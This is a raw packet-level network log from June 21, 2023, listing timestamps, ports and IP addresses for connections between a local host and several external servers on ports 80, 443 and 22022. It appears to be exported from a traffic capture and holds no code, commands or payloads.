Jun 21, 2023 04:27:58.666857958 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.666868925 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.666907072 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.666966915 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.666968107 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.667028904 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.667072058 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.667115927 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.667699099 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.667773962 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.667792082 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.667849064 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.667907000 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.667933941 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.667999983 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.668050051 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.668067932 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.668097019 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.668143988 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.668199062 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.668205976 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.668256044 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.668256998 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.668339014 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.668387890 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.668432951 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.668446064 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.668478966 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.668528080 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.668541908 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.668596983 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.668649912 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.668653011 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.668697119 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.668711901 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.668808937 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.668874025 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.668875933 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.668936014 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.668978930 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.669023991 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.669054031 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.669054985 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.669095039 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.669095039 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.669126987 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.669146061 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.669166088 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.669195890 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.669226885 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.669236898 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.669322014 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:59.048901081 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:28:01.108921051 CEST	49718	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:28:01.126285076 CEST	80	49718	188.114.96.7	192.168.2.3
Jun 21, 2023 04:28:01.126425028 CEST	49718	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:28:01.162023067 CEST	49723	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:28:01.179133892 CEST	80	49723	188.114.96.7	192.168.2.3
Jun 21, 2023 04:28:01.179631948 CEST	49723	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:28:01.180274010 CEST	49723	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:28:01.180311918 CEST	49723	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:28:01.197253942 CEST	80	49723	188.114.96.7	192.168.2.3
Jun 21, 2023 04:28:01.197300911 CEST	80	49723	188.114.96.7	192.168.2.3
Jun 21, 2023 04:28:01.308782101 CEST	80	49723	188.114.96.7	192.168.2.3
Jun 21, 2023 04:28:01.308826923 CEST	80	49723	188.114.96.7	192.168.2.3
Jun 21, 2023 04:28:01.308919907 CEST	49723	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:28:01.319974899 CEST	49723	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:28:01.320023060 CEST	49723	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:28:01.336987019 CEST	80	49723	188.114.96.7	192.168.2.3
Jun 21, 2023 04:28:01.337034941 CEST	80	49723	188.114.96.7	192.168.2.3
Jun 21, 2023 04:28:01.395956039 CEST	80	49723	188.114.96.7	192.168.2.3
Jun 21, 2023 04:28:01.396030903 CEST	80	49723	188.114.96.7	192.168.2.3
Jun 21, 2023 04:28:01.396146059 CEST	49723	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:28:01.429312944 CEST	49725	443	192.168.2.3	103.233.24.19
Jun 21, 2023 04:28:01.429373980 CEST	443	49725	103.233.24.19	192.168.2.3
Jun 21, 2023 04:28:01.429617882 CEST	49725	443	192.168.2.3	103.233.24.19
Jun 21, 2023 04:28:01.430355072 CEST	49725	443	192.168.2.3	103.233.24.19
Jun 21, 2023 04:28:01.430392027 CEST	443	49725	103.233.24.19	192.168.2.3
Jun 21, 2023 04:28:01.543790102 CEST	49726	443	192.168.2.3	149.154.167.99
Jun 21, 2023 04:28:01.543848038 CEST	443	49726	149.154.167.99	192.168.2.3
Jun 21, 2023 04:28:01.543972015 CEST	49726	443	192.168.2.3	149.154.167.99
Jun 21, 2023 04:28:01.575891018 CEST	49726	443	192.168.2.3	149.154.167.99
Jun 21, 2023 04:28:01.575931072 CEST	443	49726	149.154.167.99	192.168.2.3
Jun 21, 2023 04:28:01.657175064 CEST	443	49726	149.154.167.99	192.168.2.3
Jun 21, 2023 04:28:01.657289982 CEST	49726	443	192.168.2.3	149.154.167.99
Jun 21, 2023 04:28:01.739880085 CEST	443	49725	103.233.24.19	192.168.2.3
Jun 21, 2023 04:28:01.740014076 CEST	49725	443	192.168.2.3	103.233.24.19
Jun 21, 2023 04:28:01.741689920 CEST	49725	443	192.168.2.3	103.233.24.19
Jun 21, 2023 04:28:01.741722107 CEST	443	49725	103.233.24.19	192.168.2.3
Jun 21, 2023 04:28:01.742193937 CEST	443	49725	103.233.24.19	192.168.2.3
Jun 21, 2023 04:28:01.743141890 CEST	49725	443	192.168.2.3	103.233.24.19
Jun 21, 2023 04:28:01.784316063 CEST	443	49725	103.233.24.19	192.168.2.3
Jun 21, 2023 04:28:02.180488110 CEST	443	49725	103.233.24.19	192.168.2.3
Jun 21, 2023 04:28:02.180550098 CEST	443	49725	103.233.24.19	192.168.2.3
Jun 21, 2023 04:28:02.180655003 CEST	49725	443	192.168.2.3	103.233.24.19
Jun 21, 2023 04:28:02.180705070 CEST	443	49725	103.233.24.19	192.168.2.3
Jun 21, 2023 04:28:02.316755056 CEST	49726	443	192.168.2.3	149.154.167.99
Jun 21, 2023 04:28:02.316817999 CEST	443	49726	149.154.167.99	192.168.2.3
Jun 21, 2023 04:28:02.317785025 CEST	443	49726	149.154.167.99	192.168.2.3
Jun 21, 2023 04:28:02.319087029 CEST	49726	443	192.168.2.3	149.154.167.99
Jun 21, 2023 04:28:02.323647976 CEST	49726	443	192.168.2.3	149.154.167.99
Jun 21, 2023 04:28:02.324225903 CEST	443	49725	103.233.24.19	192.168.2.3
Jun 21, 2023 04:28:02.324390888 CEST	49725	443	192.168.2.3	103.233.24.19
Jun 21, 2023 04:28:02.324424982 CEST	443	49725	103.233.24.19	192.168.2.3
Jun 21, 2023 04:28:02.361222029 CEST	443	49726	149.154.167.99	192.168.2.3
Jun 21, 2023 04:28:02.361293077 CEST	443	49726	149.154.167.99	192.168.2.3
Jun 21, 2023 04:28:02.361370087 CEST	443	49726	149.154.167.99	192.168.2.3
Jun 21, 2023 04:28:02.361443043 CEST	49726	443	192.168.2.3	149.154.167.99
Jun 21, 2023 04:28:02.361494064 CEST	443	49726	149.154.167.99	192.168.2.3
Jun 21, 2023 04:28:02.361527920 CEST	49726	443	192.168.2.3	149.154.167.99
Jun 21, 2023 04:28:02.361534119 CEST	443	49726	149.154.167.99	192.168.2.3
Jun 21, 2023 04:28:02.361572027 CEST	49726	443	192.168.2.3	149.154.167.99
Jun 21, 2023 04:28:02.361594915 CEST	49726	443	192.168.2.3	149.154.167.99
Jun 21, 2023 04:28:02.365242958 CEST	443	49725	103.233.24.19	192.168.2.3
Jun 21, 2023 04:28:02.365271091 CEST	443	49725	103.233.24.19	192.168.2.3
Jun 21, 2023 04:28:02.365341902 CEST	443	49725	103.233.24.19	192.168.2.3
Jun 21, 2023 04:28:02.365349054 CEST	49725	443	192.168.2.3	103.233.24.19
Jun 21, 2023 04:28:02.365384102 CEST	443	49725	103.233.24.19	192.168.2.3
Jun 21, 2023 04:28:02.365412951 CEST	49725	443	192.168.2.3	103.233.24.19
Jun 21, 2023 04:28:02.365412951 CEST	49725	443	192.168.2.3	103.233.24.19
Jun 21, 2023 04:28:02.365602970 CEST	49726	443	192.168.2.3	149.154.167.99
Jun 21, 2023 04:28:02.365633011 CEST	443	49726	149.154.167.99	192.168.2.3
Jun 21, 2023 04:28:02.442457914 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.465208054 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.465368032 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.467117071 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.489418030 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.514656067 CEST	49725	443	192.168.2.3	103.233.24.19
Jun 21, 2023 04:28:02.514699936 CEST	443	49725	103.233.24.19	192.168.2.3
Jun 21, 2023 04:28:02.644258022 CEST	443	49725	103.233.24.19	192.168.2.3
Jun 21, 2023 04:28:02.644309998 CEST	443	49725	103.233.24.19	192.168.2.3
Jun 21, 2023 04:28:02.644401073 CEST	443	49725	103.233.24.19	192.168.2.3
Jun 21, 2023 04:28:02.644406080 CEST	49725	443	192.168.2.3	103.233.24.19
Jun 21, 2023 04:28:02.644442081 CEST	49725	443	192.168.2.3	103.233.24.19
Jun 21, 2023 04:28:02.644448042 CEST	443	49725	103.233.24.19	192.168.2.3
Jun 21, 2023 04:28:02.644527912 CEST	49725	443	192.168.2.3	103.233.24.19
Jun 21, 2023 04:28:02.644560099 CEST	443	49725	103.233.24.19	192.168.2.3
Jun 21, 2023 04:28:02.646928072 CEST	49725	443	192.168.2.3	103.233.24.19
Jun 21, 2023 04:28:02.818944931 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.819118023 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.869999886 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.892627954 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.892724037 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.892910957 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.892959118 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.893004894 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.893033028 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.893054008 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.893093109 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.893093109 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.893094063 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.893101931 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.893168926 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.893229008 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.893260956 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.893275023 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.893323898 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.893331051 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.893367052 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.900424004 CEST	443	49725	103.233.24.19	192.168.2.3
Jun 21, 2023 04:28:02.900455952 CEST	443	49725	103.233.24.19	192.168.2.3
Jun 21, 2023 04:28:02.900491953 CEST	443	49725	103.233.24.19	192.168.2.3
Jun 21, 2023 04:28:02.900564909 CEST	49725	443	192.168.2.3	103.233.24.19
Jun 21, 2023 04:28:02.900614023 CEST	49725	443	192.168.2.3	103.233.24.19
Jun 21, 2023 04:28:02.900635958 CEST	443	49725	103.233.24.19	192.168.2.3
Jun 21, 2023 04:28:02.915915012 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.915983915 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.916052103 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.916098118 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.916138887 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.916143894 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.916171074 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.916183949 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.916189909 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.916232109 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.916238070 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.916306973 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.916321993 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.916368961 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.916376114 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.916414022 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.916414022 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.916456938 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.916469097 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.916501045 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.916511059 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.916544914 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.916558981 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.916588068 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.916625977 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.916631937 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.916676998 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.916677952 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.916690111 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.916721106 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.916764975 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.916774988 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.916810036 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.916853905 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.916857958 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.916897058 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.939420938 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.939482927 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.939527988 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.939738035 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.939809084 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.939820051 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.939857006 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.939908981 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.939922094 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.939977884 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.940026999 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.940043926 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.940072060 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.940083027 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.940116882 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.940160990 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.940176964 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.940202951 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.940247059 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.940260887 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.940316916 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.940344095 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.940390110 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.940434933 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.940447092 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.940481901 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.940526962 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.940537930 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.940572977 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.940577984 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.940618038 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.940664053 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.940670013 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.940710068 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.940741062 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.940754890 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.940759897 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.940809011 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.940820932 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.940874100 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.940888882 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.940933943 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.940954924 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.941024065 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.941061974 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.941082954 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.941085100 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.941147089 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.941149950 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.941200972 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.941246033 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.941265106 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.941293001 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.941346884 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.941390991 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.941402912 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.941412926 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.941450119 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.941494942 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.941529989 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.941541910 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.941554070 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.941584110 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.941586971 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.941631079 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.941641092 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.941679001 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.941721916 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.941747904 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.962050915 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.962109089 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.962146997 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.962202072 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.964236975 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.964344025 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.964402914 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.964445114 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.964449883 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.964483976 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.964498043 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.964543104 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.964560032 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.964560032 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.964610100 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.964678049 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.964679003 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.964724064 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.964770079 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.964771986 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.964818001 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.964865923 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.964879990 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.964926004 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.964975119 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.964978933 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.965019941 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.965065002 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.965071917 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.965109110 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.965154886 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.965154886 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.965199947 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.965250015 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.965260983 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.965293884 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.965297937 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.965339899 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.965384960 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.965389967 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.965429068 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.965475082 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.965476990 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.965519905 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.965565920 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.965610981 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.965637922 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.965637922 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.965655088 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.965667009 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.965699911 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.965707064 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.965744972 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.965749979 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.965790033 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.965835094 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.965843916 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:02.965879917 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:02.965897083 CEST	49727	22022	192.168.2.3	5.75.213.102
